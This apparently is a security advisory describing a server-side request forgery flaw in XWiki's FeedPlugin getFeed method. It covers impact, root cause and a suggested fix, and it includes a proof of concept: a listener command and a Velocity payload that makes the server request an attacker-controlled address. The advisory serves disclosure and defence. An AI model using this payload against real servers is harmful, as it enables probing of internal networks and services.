Impact The FeedPlugin is vulnerable to Server-Side Request Forgery (SSRF). The getFeed method accepts an arbitrary URL string and uses it to initiate an HTTP request without validating the destination against an allowlist or blocking internal network ranges. An attacker with Script Rights can use a Velocity script to force the XWiki server to scan internal network ports or access internal services (e.g., metadata services, localhost databases) that are not exposed to the internet. Technical Analysis Vulnerable Component: FeedPlugin (exposed via $xwiki.getPlugin("feed")). Root Cause: The method getFeed(String url) instantiates a connection to the provided URL without sufficient validation. Reproduction Steps & Proof of Concept
- Attacker Setup: The attacker starts an HTTP server to listen for incoming connections. Command: python3 -m http.server 4444
- Exploit Injection: Create or edit a Wiki page using the Wiki Editor (Source mode). Inject the following Velocity payload targeting the attacker's listener:
{{velocity
#set($feedPlugin = $xwiki.getPlugin("feed"))
#set($target = "http://172.19.0.1:4444/test-ssrf")
$feedPlugin.getFeed($target)
/velocity}}
- Execution: Save and View the page. This forces the XWiki backend to execute the Velocity script and process the getFeed request.
 
- Observation: The XWiki server (172.21.0.3) initiates an HTTP GET request to the attacker's machine (172.19.0.1).
Patches The FeedPlugin should validate the target URL to ensure it does not resolve to internal IP addresses (localhost, private subnets) and strictly limit allowed protocols. |
